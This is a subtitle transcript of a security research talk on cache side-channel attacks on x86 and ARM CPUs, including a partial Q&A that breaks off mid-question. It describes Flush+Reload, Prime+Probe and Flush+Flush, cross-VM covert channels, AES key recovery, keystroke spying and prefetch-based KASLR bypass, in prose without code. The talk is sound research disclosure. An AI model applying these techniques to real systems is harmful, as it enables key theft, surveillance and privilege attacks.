-
Music
-
Herald Angel: We are here with a motto,
and the motto of this year is "Works For
-
Me" and I think, who many people, how many
people in here are programmmers? Raise
-
your hands or shout or... Whoa, that's a
lot. Okay. So I think many of you will
-
work on x86. Yeah. And I think you assume
that it works, and that everything works
-
as intended And I mean: What could go
wrong? Our next talk, the first one today,
-
will be by Clémentine Maurice, who
previously was here with RowhammerJS,
-
something I would call scary, and Moritz
Lipp, who has worked on the Armageddon
-
exploit, back, what is it? Okay, so the
next... I would like to hear a really warm
-
applause for the speakers for the talk
"What could what could possibly go wrong
-
with insert x86 instruction here?"
-
thank you.
-
Applause
-
Clémentine Maurice (CM): Well, thank you
all for being here this morning. Yes, this
-
is our talk "What could possibly go wrong
with insert x86 instructions here". So
-
just a few words about ourselves: So I'm
Clémentine Maurice, I got my PhD last year
-
in computer science and I'm now working as
a postdoc at Graz University of Technology
-
in Austria. You can reach me on Twitter or
by email but there's also I think a lots
-
of time before the Congress is over.
Moritz Lipp (ML): Hi and my name is Moritz
-
Lipp, I'm a PhD student at Graz University
of Technology and you can also reach me on
-
Twitter or just after our talk and in the
next days.
-
CM: So, about this talk: So, the title
says this is a talk about x86
-
instructions, but this is not a talk about
software. Don't leave yet! I'm actually
-
even assuming safe software and the point
that we want to make is that safe software
-
does not mean safe execution and we have
information leakage because of the
-
underlying hardware and this is what we're
going to talk about today. So we'll be
-
talking about cache attacks, what are
they, what can we do with that and also a
-
special kind of cache attack that we found
this year. So... doing cache attacks
-
without memory accesses and how to use
that even to bypass kernel ASLR.
-
So again, the talk says is to talk about
x86 instructions but this is even more
-
global than that. We can also mount these
cache attacks on ARM and not only on the
-
x86. So some of the examples that you will
see also applies to ARM. So today we'll do
-
have a bit of background, but actually
most of the background will be along the
-
lines because this covers really a huge
chunk of our research, and we'll see
-
mainly three instructions: So "mov" and
how we can perform these cache attacks,
-
what are they... The instruction
"clflush", so here we'll be doing cache
-
attacks without any memory accesses. Then
we'll see "prefetch" and how we can bypass
-
kernel ASLR and lots of translations
levels, and then there's even a bonus
-
track, so it's this this will be not our
works, but even more instructions and even
-
more text.
Okay, so let's start with a bit of an
-
introduction. So we will be mainly
focusing on Intel CPUs, and this is
-
roughly in terms of cores and caches, how
it looks like today. So we have different
-
levels of cores ...uh... different cores
so here four cores, and different levels
-
of caches. So here usually we have three
levels of caches. We have level 1 and
-
level 2 that are private to each call,
which means that core 0 can only access
-
its level 1 and its level 2 and not level
1 and level 2 of, for example, core 3, and
-
we have the last level cache... so here if
you can see the pointer... So this one is
-
divided in slices so we have as many
slices as cores, so here 4 slices, but all
-
the slices are shared across core so core
0 can access the whole last level cache,
-
that's 0 1 2 & 3. We also have a nice
property on Intel CPUs is that this level
-
of cache is inclusive, and what it means
is that everything that is contained in
-
level 1 and level 2 will also be contained
in the last level cache, and this will
-
prove to be quite useful for cache
attacks.
-
So today we mostly have set associative
caches. What it means is that we have data
-
that is loaded in specific sets and that
depends only on its address. So we have
-
some bits of the address that gives us the
index and that says "Ok the line is going
-
to be loaded in this cache set", so this
is a cache set. Then we have several ways
-
per set so here we have 4 ways and the
cacheine is going to be loaded in a
-
specific way and that will only depend on
the replacement policy and not on the
-
address itself, so when you load a line
into the cache, usually the cache is
-
already full and you have to make room for
a new line. So this is where the
-
replacement replacement policy—this is
what it does—it says ok I'm going to
-
remove this line to make room for the next
line. So for today we're going to see only
-
three instruction as I've been telling
you. So the move instruction, it does a
-
lot of things but the only aspect that
we're interested in about it that can
-
access data in the main memory.
We're going to see a clflush what it does
-
is that it removes a cache line from the
cache, from the whole cache. And we're
-
going to see prefetch, it prefetches a
cache line for future use. So we're going
-
to see what they do and the kind of side
effects that they have and all the attacks
-
that we can do with them. And that's
basically all the example you need for
-
today so even if you're not an expert of
x86 don't worry it's not just slides full
-
of assembly and stuff. Okay so on to the
first one.
-
ML: So we will first start with the 'mov'
instruction and actually the first slide
-
is full of code, however as you can see
the mov instruction is used to move data
-
from registers to registers, from the main
memory and back to the main memory and as
-
you can see there are many moves you can
use but basically it's just to move data
-
and that's all we need to know. In
addition, a lot of exceptions can occur so
-
we can assume that those restrictions are
so tight that nothing can go wrong when
-
you just move data because moving data is
simple.
-
However while there are a lot of
exceptions the data that is accessed is
-
always loaded into the cache, so data is
in the cache and this is transparent to
-
the program that is running. However,
there are side-effects when you run these
-
instructions, and we will see how they
look like with the mov instruction. So you
-
probably all know that data can either be
in CPU registers, in the different levels
-
of the cache that Clementine showed to you
earlier, in the main memory, or on the
-
disk, and depending on where the memory
and the data is located it needs a longer
-
time to be loaded back to the CPU, and
this is what we can see in this plot. So
-
we try here to measure the access time of
an address over and over again, assuming
-
that when we access it more often, it is
already stored in the cache. So around 70
-
cycles, most of the time we can assume
when we load an address and it takes 70
-
cycles, it's loaded into the cache.
However, when we assume that the data is
-
loaded from the main memory, we can
clearly see that it needs a much longer
-
time like a bit more than 200 cycles. So
depending when we measure the time it
-
takes to load the address we can say the
data has been loaded to the cache or the
-
data is still located in the main memory.
And this property is what we can exploit
-
using cache attacks. So we measure the
timing differences on memory accesses. And
-
what an attacker does he monitors the
cache lines, but he has no way to know
-
what's actually the content of the cache
line. So we can only monitor that this
-
cache line has been accessed and not
what's actually stored in the cache line.
-
And what you can do with this is you can
implement covert channels, so you can
-
allow two processes to communicate with
each other evading the permission system
-
what we will see later on. In addition you
can also do side channel attacks, so you
-
can spy with a malicious attacking
application on benign processes, and you
-
can use this to steal cryptographic keys
or to spy on keystrokes.
-
And basically we have different types of
cache attacks and I want to explain the
-
most popular one, the "Flush+Reload"
attack, in the beginning. So on the left,
-
you have the address space of the victim,
and on the right you have the address
-
space of the attacker who maps a shared
library—an executable—that the victim is
-
using in to its own address space, like
the red rectangle. And this means that
-
when this data is stored in the cache,
it's cached for both processes. Now the
-
attacker can use the flush instruction to
remove the data out of the cache, so it's
-
not in the cache anymore, so it's also not
cached for the victim. Now the attacker
-
can schedule the victim and if the victim
decides "yeah, I need this data", it will
-
be loaded back into the cache. And now the
attacker can reload the data, measure the
-
time how long it took, and then decide
"okay, the victim has accessed the data in
-
the meantime" or "the victim has not
accessed the data in the meantime." And by
-
that you can spy if this address has been
used.
-
The second type of attack is called
"Prime+Probe" and it does not rely on the
-
shared memory like the "Flush+Reload"
attack, and it works as following: Instead
-
of mapping anything into its own address
space, the attacker loads a lot of data
-
into one cache line, here, and fills the
cache. Now he again schedules the victim
-
and the schedule can access data that maps
to the same cache set.
-
So the cache set is used by the attacker
and the victim at the same time. Now the
-
attacker can start measuring the access
time to the addresses he loaded into the
-
cache before, and when he accesses an
address that is still in the cache it's
-
faster so he measures the lower time. And
if it's not in the cache anymore it has to
-
be reloaded into the cache so it takes a
longer time. He can sum this up and detect
-
if the victim has loaded data into the
cache as well. So the first thing we want
-
to show you is what you can do with cache
attacks is you can implement a covert
-
channel and this could be happening in the
following scenario.
-
You install an app on your phone to view
your favorite images you take, to apply
-
some filters, and in the end you don't
know that it's malicious because the only
-
permission it requires is to access your
images which makes sense. So you can
-
easily install it without any fear. In
addition you want to know what the weather
-
is outside, so you install a nice little
weather widget, and the only permission it
-
has is to access the internet because it
has to load the information from
-
somewhere. So what happens if you're able
to implement a covert channel between two
-
these two applications, without any
permissions and privileges so they can
-
communicate with each other without using
any mechanisms provided by the operating
-
system, so it's hidden. It can happen that
now the gallery app can send the image to
-
the internet, it will be uploaded and
exposed for everyone. So maybe you don't
-
want to see the cat picture everywhere.
While we can do this with those
-
Prime+Probe/ Flush+Reload attacks, we will
discuss a covert channel using
-
Prime+Probe. So how can we transmit this
data? We need to transmit ones and zeros
-
at some point. So the sender and the
receiver agree on one cache set that they
-
both use. The receiver probes the set all
the time. When the sender wants to
-
transmit a zero he just does nothing, so
the lines of the receiver are in the cache
-
all the time, and he knows "okay, he's
sending nothing", so it's a zero.
-
On the other hand if the sender wants to
transmit a one, he starts accessing
-
addresses that map to the same cache set
so it will take a longer time for the
-
receiver to access its addresses again,
and he knows "okay, the sender just sent
-
me a one", and Clementine will show you
what you can do with this covert channel.
-
CM: So the really nice thing about
-
Prime+Probe is that it has really low
requirements. It doesn't need any kind of
-
shared memory. For example if you have two
virtual machines you could have some
-
shared memory via memory deduplication.
The thing is that this is highly insecure,
-
so cloud providers like Amazon ec2, they
disable that. Now we can still use
-
Prime+Probe because it doesn't need this
shared memory. Another problem with cache
-
covert channels is that they are quite
noisy. So when you have other applications
-
that are also running on the system, they
are all competing for the cache and they
-
might, like, evict some cache lines,
especially if it's an application that is
-
very memory intensive. And you also have
noise due to the fact that the sender and
-
the receiver might not be scheduled at the
same time. So if you have your sender that
-
sends all the things and the receiver is
not scheduled then some part of the
-
transmission can get lost. So what we did
is we tried to build an error-free covert
-
channel. We took care of all these noise
issues by using some error detection to
-
resynchronize the sender and the receiver
and then we use some error correction to
-
correct the remaining errors.
So we managed to have a completely error-
-
free covert channel even if you have a lot
of noise, so let's say another virtual
-
machine also on the machine serving files
through a web server, also doing lots of
-
memory-intensive tasks at the same time,
and the covert channel stayed completely
-
error-free, and around 40 to 75 kilobytes
per second, which is still quite a lot.
-
All of this is between virtual machines on
Amazon ec2. And the really neat thing—we
-
wanted to do something with that—and
basically we managed to create an SSH
-
connection really over the cache. So they
don't have any network between
-
them, but just we are sending the zeros
and the ones and we have an SSH connection
-
between them. So you could say that cache
covert channels are nothing, but I think
-
it's a real threat. And if you want to
have more details about this work in
-
particular, it will be published soon at
NDSS.
-
So the second application that we wanted
to show you is that we can attack crypto
-
with cache attacks. In particular we are
going to show an attack on AES and a
-
special implementation of AES that uses
T-Tables. so that's the fast software
-
implementation because it uses some
precomputed lookup tables. It's known to
-
be vulnerable to side-channel attacks
since 2006 by Osvik et al, and it's a one-
-
round known plaintext attack, so you have
p—or plaintext—and k, your secret key. And
-
the AES algorithm, what it does is compute
an intermediate state at each round r.
-
And in the first round, the accessed table
indices are just p XOR k. Now it's a known
-
plaintext attack, what this means is that
if you can recover the accessed table
-
indices you've also managed to recover the
key because it's just XOR. So that would
-
be bad, right, if we could recover these
accessed table indices. Well we can, with
-
cache attacks! So we did that with
Flush+Reload and with Prime+Probe. On the
-
x-axis you have the plaintext byte values
and on the y-axis you have the addresses
-
which are essentially the T table entries.
So a black cell means that we've monitored
-
the cache line, and we've seen a lot of
cache hits. So basically the blacker it
-
is, the more certain we are that the
T-Table entry has been accessed. And here
-
it's a toy example, the key is all-zeros,
but you would basically just have a
-
different pattern if the key was not all-
zeros, and as long as you can see this
-
nice diagonal or a pattern then you have
recovered the key. So it's an old attack,
-
2006, it's been 10 years, everything
should be fixed by now, and you see where
-
I'm going: it's not. So on Android the
bouncy castle implementation it uses by
-
default the T-table, so that's bad. Also
many implementations that you can find
-
online uses pre-computed values, so maybe
be wary about this kind of attacks. The
-
last application we wanted to show you is
how we can spy on keystrokes.
-
So for that we will use flush and reload
because it's a really fine grained
-
attack. We can see very precisely which
cache line has been accessed, and a cache
-
line is only 64 bytes so it's really not a
lot and we're going to use that to spy on
-
keystrokes and we even have a small demo
for you.
-
ML: So what you can see on the screen this
is not on Intel x86 it's on a smartphone,
-
on the Galaxy S6, but you can also apply
these cache attacks there so that's what
-
we want to emphasize.
So on the left you see the screen and on
-
the right we have connected a shell with
no privileges and permissions, so it can
-
basically be an app that you install
glass bottle falling
-
from the App Store and on the right we are
going to start our spy tool, and on the
-
left we just open the messenger app and
whenever the user hits any key on the
-
keyboard our spy tool takes care of that
and notices that. Also if he presses the
-
spacebar we can also measure that. If the
user decides "ok, I want to delete the
-
word" because he changed his mind, we can
also register if the user pressed the
-
backspace button, so in the end we can see
exactly how long the words were, the user
-
typed into his phone without any
permissions and privileges, which is bad.
-
laughs
applause
-
ML: so enough about the mov instruction,
let's head to clflush.
-
CM: So the clflush instruction: What it
does is that it invalidates from every
-
level the cache line that contains the
address that you pass to this instruction.
-
So in itself it's kind of bad because it
enables the Flush+Reload attacks that we
-
showed earlier, that was just flush,
reload, and the flush part is done with
-
clflush. But there's actually more to it,
how wonderful. So there's a first timing
-
leakage with it, so we're going to see
that the clflush instruction has a
-
different timing depending on whether the
data that you that you pass to it is
-
cached or not. So imagine you have a cache
line that is on the level 1 by inclu...
-
With the inclusion property it has to be
also in the last level cache. Now this is
-
quite convenient and this is also why we
have this inclusion property for
-
performance reason on Intel CPUs, if you
want to see if a line is present at all in
-
the cache you just have to look in the
last level cache. So this is basically
-
what the clflush instruction does. It goes
to the last last level cache, sees "ok
-
there's a line, I'm going to flush this
one" and then there's something that tells
-
ok the line is also present somewhere else
so then it flushes the line in level 1
-
and/or level 2. So that's slow. Now if you
perform clflush on some data that is not
-
cached, basically it does the same, goes
to the last level cache, see that there's
-
no line and there can't be any... This
data can't be anywhere else in the cache
-
because it would be in the last level
cache if it was anywhere, so it does
-
nothing and it stop there. So that's fast.
So how exactly fast and slow am I talking
-
about? So it's actually only a very few
cycles so we did this experiments on
-
different microarchitecture so Center
Bridge, Ivy Bridge, and Haswell and...
-
So it different colors correspond to the
different microarchitecture. So first
-
thing that is already... kinda funny is
that you can see that you can distinguish
-
the micro architecture quite nicely with
this, but the real point is that you have
-
really a different zones. The solids...
The solid line is when we performed the
-
measurement on clflush with the line that
was already in the cache, and the dashed
-
line is when the line was not in the
cache, and in all microarchitectures you
-
can see that we can see a difference: It's
only a few cycles, it's a bit noisy, so
-
what could go wrong? Okay, so exploiting
these few cycles, we still managed to
-
perform a new cache attacks that we call
"Flush+Flush", so I'm going to explain
-
that to you: So basically everything that
we could do with "Flush+Reload", we can
-
also do with "Flush+Flush". We can perform
cover channels and sidechannel attacks.
-
It's stealthier than previous cache
attacks, I'm going to go back on this one,
-
and it's also faster than previous cache
attacks. So how does it work exactly? So
-
the principle is a bit similar to
"Flush+Reload": So we have the attacker
-
and the victim that have some kind of
shared memory, let's say a shared library.
-
It will be shared in the cache The
attacker will start by flushing the cache
-
line then let's the victim perform
whatever it does, let's say encryption,
-
the victim will load some data into the
cache, automatically, and now the attacker
-
wants to know again if the victim accessed
this precise cache line and instead of
-
reloading it is going to flush it again.
And since we have this timing difference
-
depending on whether the data is in the
cache or not, it gives us the same
-
information as if we reloaded it, except
it's way faster. So I talked about
-
stealthiness. So the thing is that
basically these cache attacks and that
-
also applies to "Rowhammer": They are
already stealth in themselves, because
-
there's no antivirus today that can detect
them. but some people thought that we
-
could detect them with performance
counters because they do a lot of cache
-
misses and cache references that happen
when the data is flushed and when you
-
reaccess memory. now what we thought is
that yeah but that also not the only
-
program steps to lots of cache misses and
cache references so we would like to have
-
a slightly parametric. So these cache
attacks they have a very heavy activity on
-
the cache but they're also very particular
because there are very short loops of code
-
if you take flush and reload this just
flush one line reload the line and then
-
again flush reload that's very short loop
and that creates a very low pressure on
-
the instruction therapy which is kind of
particular for of cache attacks so what we
-
decided to do is normalizing the cache
even so the cache misses and cache
-
references by events that have to do with
the instruction TLB and there we could
-
manage to detect cache attacks and
Rowhammer without having false positives
-
so the system metric that I'm going to use
when I talk about stealthiness so we
-
started by creating a cover channel. First
we wanted to have it as fast as possible
-
so we created a protocol to evaluates all
the kind of cache attack that we had so
-
flush+flush, flush+reload, and
prime+probe and we started with a
-
packet side of 28 doesn't really matter.
We measured the capacity of our covert
-
channel and flush+flush is around
500 kB/s whereas Flush+Reload
-
was only 300 kB/s
so Flush+Flush is already quite an
-
improvement on the speed.
Then we measured the stealth zone at this
-
speed only Flush+Flush was stealth and
now the thing is that Flush+Flush and
-
Flush+Reload as you've seen there are
some similarities so for a covert channel
-
they also share the same center on it is
receivers different and for this one the
-
center was not stealth for both of them
anyway if you want a fast covert channel
-
then just try flush+flush that works.
Now let's try to make it stealthy
-
completely stealthy because if I have the
standard that is not stealth maybe that we
-
give away the whole attack so we said okay
maybe if we just slow down all the attacks
-
then there will be less cache hits,
cache misses and then maybe all
-
the attacks are actually stealthy why not?
So we tried that we slowed down everything
-
so Flush+Reload and Flash+Flash
are around 50 kB/s now
-
Prime+Probe is a bit slower because it
takes more time
-
to prime and probe anything but still
-
even with this slow down only Flush+Flush
has its receiver stealth and we also
-
managed to have the sender stealth now so
basically whether you want a fast covert
-
channel or a stealth covert channel
Flush+Flush is really great.
-
Now we wanted to also evaluate if it
wasn't too noisy to perform some side
-
channel attack so we did these side
channels on the AES t-table implementation
-
the attacks that we have shown you
earlier, so we computed a lot of
-
encryption that we needed to determine the
upper four bits of a key bytes so here the
-
lower the better the attack and Flush +
Reload is a bit better so we need only 250
-
encryptions to recover these bits but
Flush+Flush comes quite, comes quite
-
close with 350 and Prime+Probe is
actually the most noisy of them all, needs
-
5... close to 5000 encryptions so we have
around the same performance for
-
Flush+Flush and Flush+Reload.
Now let's evaluate the stealthiness again.
-
So what we did here is we perform 256
billion encryptions in a synchronous
-
attack so we really had the spy and the
victim scattered and we evaluated the
-
stealthiness of them all and here only
Flush+Flush again is stealth. And while
-
you can always slow down a covert channel
you can't actually slow down a side
-
channel because, in a real-life scenario,
you're not going to say "Hey victim, him
-
wait for me a bit, I am trying to do an
attack here." That won't work.
-
So there's even more to it but I will need
again a bit of background before
-
continuing. So I've shown you the
different levels of caches and here I'm
-
going to focus more on the last-level
cache. So we have here our four slices so
-
this is the last-level cache and we have
some bits of the address here that
-
corresponds to the set, but more
importantly, we need to know where in
-
which slice and address is going to be.
And that is given, that is given by some
-
bits of the set and the type of the
address that are passed into a function
-
that says in which slice the line is going
to be.
-
Now the thing is that this hash function
is undocumented by Intel. Wouldn't be fun
-
otherwise. So we have this: As many slices
as core, an undocumented hash function
-
that maps a physical address to a slice,
and while it's actually a bit of a pain
-
for attacks, it has, it was not designed
for security originally but for
-
performance, because you want all the
access to be evenly distributed in the
-
different slices, for performance reasons.
So the hash function basically does, it
-
takes some bits of the physical address
and output k bits of slice, so just one
-
bits if you have a two-core machine, two
bits if you have a four-core machine and
-
so on. Now let's go back to clflush, see
what's the relation with that.
-
So the thing that we noticed is that
clflush is actually faster to reach a line
-
on the local slice.
So if you have, if you're flushing always
-
one line and you run your program on core
zero, core one, core two and core three,
-
you will observe that one core in
particular on, when you run the program on
-
one core, the clflush is faster. And so
here this is on core one, and you can see
-
that core zero, two, and three it's, it's
a bit slower and here we can deduce that,
-
so we run the program on core one and we
flush always the same line and we can
-
deduce that the line belong to slice one.
And what we can do with that is that we
-
can map physical address to slices.
And that's one way to reverse-engineer
-
this addressing function that was not
documented.
-
Funnily enough that's not the only way:
What I did before that was using the
-
performance counters to reverse-engineer
this function, but that's actually a whole
-
other story and if you want more detail on
that, there's also an article on that.
-
ML: So the next instruction we want to
-
talk about is the prefetch instruction.
And the prefetch instruction is used to
-
tell the CPU: "Okay, please load the data
I need later on, into the cache, if you
-
have some time." And in the end there are
actually six different prefetch
-
instructions: prefetcht0 to t2 which
means: "CPU, please load the data into the
-
first-level cache", or in the last-level
cache, whatever you want to use, but we
-
spare you the details because it's not so
interesting in the end.
-
However, what's more interesting is when
we take a look at the Intel manual and
-
what it says there. So, "Using the
PREFETCH instruction is recommended only
-
if data does not fit in the cache." So you
can tell the CPU: "Please load data I want
-
to stream into the cache, so it's more
performant." "Use of software prefetch
-
should be limited to memory addresses that
are managed or owned within the
-
application context."
So one might wonder what happens if this
-
address is not managed by myself. Sounds
interesting. "Prefetching to addresses
-
that are not mapped to physical pages can
experience non-deterministic performance
-
penalty. For example specifying a NULL
pointer as an address for prefetch can
-
cause long delays."
So we don't want to do that because our
-
program will be slow. So, let's take a
look what they mean with non-deterministic
-
performance penalty, because we want to
write good software, right? But before
-
that, we have to take a look at a little
bit more background information to
-
understand the attacks.
So on modern operating systems, every
-
application has its own virtual address
space. So at some point, the CPU needs to
-
translate these addresses to the physical
addresses actually in the DRAM. And for
-
that we have this very complex-looking
data structure. So we have a 48-bit
-
virtual address, and some of those bits
mapped to a table, like the PM level 4
-
table, with 512 entries, so depending on
those bits the CPU knows, at which line he
-
has to look.
And if there is data there, because the
-
address is mapped, he can proceed and look
at the page directory, point the table,
-
and so on for the town. So is everything,
is the same for each level until you come
-
to your page table, where you have
4-kilobyte pages. So it's in the end not
-
that complicated, but it's a bit
confusing, because you want to know a
-
physical address, so you have to look it
up somewhere in the, in the main memory
-
with physical addresses to translate your
virtual addresses. And if you have to go
-
through all those levels, it needs a long
time, so we can do better than that and
-
that's why Intel introduced additional
caches, also for all of those levels. So,
-
if you want to translate an address, you
take a look at the ITLB for instructions,
-
and the data TLB for data. If it's there,
you can stop, otherwise you go down all
-
those levels and if it's not in any cache
you have to look it up in the DRAM. In
-
addition, the address space you have is
shared, because you have, on the one hand,
-
the user memory and, on the other hand,
you have mapped the kernel for convenience
-
and performance also in the address space.
And if your user program wants to access
-
some kernel functionality like reading a
file, it will switch to the kernel memory
-
there's a privilege escalation, and then
you can read the file, and so on. So,
-
that's it. However, you have drivers in
the kernel, and if you know the addresses
-
of those drivers, you can do code-reuse
attacks, and as a countermeasure, they
-
introduced address-space layout
randomization, also for the kernel.
-
And this means that when you have your
program running, the kernel is mapped at
-
one address and if you reboot the machine
it's not on the same address anymore but
-
somewhere else. So if there is a way to
find out at which address the kernel is
-
loaded, you have circumvented this
countermeasure and defeated kernel address
-
space layout randomization. So this would
be nice for some attacks. In addition,
-
there's also the kernel direct physical
map. And what does this mean? It's
-
implemented on many operating systems like
OS X, Linux, also on the Xen hypervisor
-
and
BSD, but not on Windows. But what it means
-
is that the complete physical memory is
mapped in additionally in the kernel
-
memory at a fixed offset. So, for every
page that is mapped in the user space,
-
there's something like a twin page in the
kernel memory, which you can't access
-
because it's in the kernel memory.
However, we will need it later, because
-
now we go back to prefetch and see what we
can do with that. So, prefetch is not a
-
usual instruction, because it just tells
the CPU "I might need that data later on.
-
If you have time, load for me," if not,
the CPU can ignore it because it's busy
-
with other stuff. So, there's no necessity
that this instruction is really executed,
-
but most of the time it is. And a nice,
interesting thing is that it generates no
-
faults, so whatever you pass to this
instruction, your program won't crash, and
-
it does not check any privileges, so I can
also pass an kernel address to it and it
-
won't say "No, stop, you accessed an
address that you are not allowed to
-
access, so I crash," it just continues,
which is nice.
-
The second interesting thing is that the
operand is a virtual address, so every
-
time you execute this instruction, the CPU
has to go and check "OK, what physical
-
address does this virtual address
correspond to?" So it has to do the lookup
-
with all those tables we've seen earlier,
and as you probably have guessed already,
-
the execution time varies also for the
prefetch instruction and we will see later
-
on what we can do with that.
So, let's get back to the direct physical
-
map. Because we can create an oracle for
address translation, so we can find out
-
what physical address belongs to the
virtual address. Because nowadays you
-
don't want that the user to know, because
you can craft nice rowhammer attacks with
-
that information, and more advanced cache
attacks, so you restrict this information
-
to the user. But let's check if we find a
way to still get this information. So, as
-
I've told you earlier, if you have a
paired page in the user space map,
-
you have the twin page in the kernel
space, and if it's cached,
-
its cached for both of them again.
-
So, the attack now works as the following:
From the attacker you flush your user
-
space page, so it's not in the cache for
the... also for the kernel memory, and
-
then you call prefetch on the address of
the kernel, because as I told you, you
-
still can do that because it doesn't
create any faults. So, you tell the CPU
-
"Please load me this data into the cache
even if I don't have access to this data
-
normally."
And if we now measure on our user space
-
page the address again, and we measure a
cache hit, because it has been loaded by
-
the CPU into the cache, we know exactly at
which position, since we passed the
-
address to the function, this address
corresponds to. And because this is at a
-
fixed offset, we can just do a simple
subtraction and know the physical address
-
again. So we have a nice way to find
physical addresses for virtual addresses.
-
And in practice this looks like this
following plot. So, it's pretty simple,
-
because we just do this for every address,
and at some point we measure a cache hit.
-
So, there's a huge difference. And exactly
at this point we know this physical
-
address corresponds to our virtual
address. The second thing is that we can
-
exploit the timing differences it needs
for the prefetch instruction. Because, as
-
I told you, when you go down this cache
levels, at some point you see "it's here"
-
or "it's not here," so it can abort early.
And with that we can know exactly
-
when the prefetch
instruction aborted, and know how the
-
pages are mapped into the address space.
So, the timing depends on where the
-
translation stops. And using those two
properties and those information, we can
-
do the following: On the one hand, we can
build variants of cache attacks. So,
-
instead of Flush+Reload, we can do
Flush+Prefetch, for instance. We can
-
also use prefetch to mount rowhammer
attacks on privileged addresses, because
-
it doesn't do any faults when we pass
those addresses, and it works as well. In
-
addition, we can use it to recover the
translation levels of a process, which you
-
could do earlier with the page map file,
but as I told you it's now privileged, so
-
you don't have access to that, and by
doing that you can bypass address space
-
layout randomization. In addition, as I
told you, you can translate virtual
-
addresses to physical addresses, which is
now also privileged with the page map
-
file, and using that it reenables return
to direct exploits, which have been
-
demonstrated last year. On top of that, we
can also use this to locate kernel
-
drivers, as I told you. It would be nice
if we can circumvent KSLR as well, and I
-
will show you now how this is possible.
So, with the first oracle we find out all
-
the pages that are mapped, and for each of
those pages, we evict the translation
-
caches, and we can do that by either
calling sleep,
-
which schedules another program, or access
just a large memory buffer. Then, we
-
perform a syscall to the driver. So,
there's code of the driver executed and
-
loaded into the cache, and then we just
measure the time prefetch takes on this
-
address. And in the end, the fastest
average access time is the driver page.
-
So, we can mount this attack on Windows 10
in less than 12 seconds. So, we can defeat
-
KSLR in less than 12 seconds, which is
very nice. And in practice, the
-
measurements looks like the following: So,
we have a lot of long measurements, and at
-
some point you have a low one, and you
know exactly that this driver region and
-
the address the driver is located. And
you can mount those read to direct
-
attacks again. However, that's not
everything, because there are more
-
instructions in Intel.
CM: Yeah, so, the following is not our
-
work, but we thought that would be
interesting, because it's basically more
-
instructions, more attacks, more fun. So
there's the RDSEED instruction, and what
-
it does, that is request a random seed to
the hardware random number generator. So,
-
the thing is that there is a fixed number
of precomputed random bits, and that takes
-
time to regenerate them. So, as everything
that takes time, you can create a covert
-
channel with that. There is also FADD and
FMUL, which are floating point operations.
-
Here, the running time of this instruction
depends on the operands. Some people
-
managed to bypass Firefox's same origin
policy with an SVG filter timing attack
-
with that. There's also the JMP
instructions. So, in modern CPUs you have
-
branch prediction, and branch target
prediction. With that, it's actually been
-
studied a lot, you can create a covert
channel. You can do side-channel attacks
-
on crypto. You can also bypass KSLR, and
finally, there are TSX instructions, which
-
is an extension for hardware transactional
memory support, which has also been used
-
to bypass KSLR. So, in case you're not
sure, KSLR is dead. You have lots of
-
different things to read. Okay, so, on the
conclusion now. So, as you've seen, it's
-
actually more a problem of CPU design,
than really the instruction sets
-
architecture. The thing is that all these
issues are really hard to patch. They
-
are all linked to performance
optimizations, and we are not getting rid
-
of performance optimization. That's
basically a trade-off between performance
-
and security, and performance seems to
always win. There has been some
-
propositions to... against cache attacks,
to... let's say remove the CLFLUSH
-
instructions. The thing is that all these
quick fix won't work, because we always
-
find new ways to do the same thing without
these precise instructions and also, we
-
keep finding new instruction that leak
information. So, it's really, let's say
-
quite a big topic that we have to fix
this. So, thank you very much for your
-
attention. If you have any questions we'd
be happy to answer them.
-
applause
-
applause
Herald: Okay. Thank you very much again
-
for your talk, and now we will have a Q&A,
and we have, I think, about 15 minutes, so
-
you can start lining up behind the
microphones. They are in the gangways in
-
the middle. Except, I think that one...
oh, no, it's back up, so it will work. And
-
while we wait, I think we will take
questions from our signal angel, if there
-
are any. Okay, there aren't any, so...
microphone questions. I think, you in
-
front.
Microphone: Hi. Can you hear me?
-
Herald: Try again.
Microphone: Okay. Can you hear me now?
-
Okay. Yeah, I'd like to know what exactly
was your stealthiness metric? Was it that
-
you can't distinguish it from a normal
process, or...?
-
CM: So...
Herald: Wait a second. We have still Q&A,
-
so could you quiet down a bit? That would
be nice.
-
CM: So, the question was about the
stealthiness metric. Basically, we use the
-
metric with cache misses and cache
references, normalized by the instructions
-
TLB events, and we
just found the threshold under which
-
pretty much every benign application was
below this, and rowhammer and cache
-
attacks were after that. So we fixed the
threshold, basically.
-
H: That microphone.
Microphone: Hello. Thanks for your talk.
-
It was great. First question: Did you
inform Intel before doing this talk?
-
CM: Nope.
Microphone: Okay. The second question:
-
What's your future plans?
CM: Sorry?
-
M: What's your future plans?
CM: Ah, future plans. Well, what I did,
-
that is interesting, is that we keep
finding these more or less by accident, or
-
manually, so having a good idea of what's
the attack surface here would be a good
-
thing, and doing that automatically would
be even better.
-
M: Great, thanks.
H: Okay, the microphone in the back,
-
over there. The guy in white.
M: Hi. One question. If you have,
-
like, a demon, that randomly invalidates
some cache lines, would that be a better
-
countermeasure than disabling the caches?
ML: What was the question?
-
CM: If invalidating cache lines would be
better than disabling the whole cache. So,
-
I'm...
ML: If you know which cache lines have
-
been accessed by the process, you can
invalidate those cache lines before you
-
swap those processes, but it's also a
trade-off between performance. Like, you
-
can also, if you switch processes, flush
the whole cache, and then it's empty, and
-
then you don't see any activity anymore,
but there's also the trade-off of
-
performance with this.
M: Okay, maybe a second question. If you,
-
there are some ARM architectures
that have random cache line invalidations.
-
Did you try those, if you can see a
[unintelligible] channel there.
-
ML: If they're truly random, but probably
you just have to make more measurements
-
and more measurements, and then you can
average out the noise, and then you can do
-
these attacks again. It's like, with prime
and probe, where you need more
-
measurements, because it's much more
noisy, so in the end you will just need
-
much more measurements.
CM: So, on ARM, it's supposed to be pretty
-
random. At least it's in the manual, but
we actually found nice ways to evict cache
-
lines, that we really wanted to evict, so
it's not actually that pseudo-random.
-
So, even... let's say, if something is
truly random, it might be nice, but then
-
it's also quite complicated to implement.
I mean, you probably don't want a random
-
number generator just for the cache.
M: Okay. Thanks.
-
H: Okay, and then the three guys here on
the microphone in the front.
-
M: My question is about a detail with the
keylogger. You could distinguish between
-
space, backspace and alphabet, which is
quite interesting. But could you also
-
figure out the specific keys that were
pressed, and if so, how?
-
ML: Yeah, that depends on the
implementation of the keyboard. But what
-
we did, we used the Android stock
keyboard, which is shipped with the
-
Samsung, so it's pre-installed. And if you
have a table somewhere in your code, which
-
says "Okay, if you press this exact
location or this image, it's an A or it's
-
an B", then you can also do a more
sophisticated attack. So, if you find any
-
functions or data in the code, which
directly tells you "Okay, this is this
-
character," you can also spy on the actual
key characters on the keyboard.
-
M: Thank you.
M: Hi. Thank you for your talk. My first
-
question is: What can we actually do now,
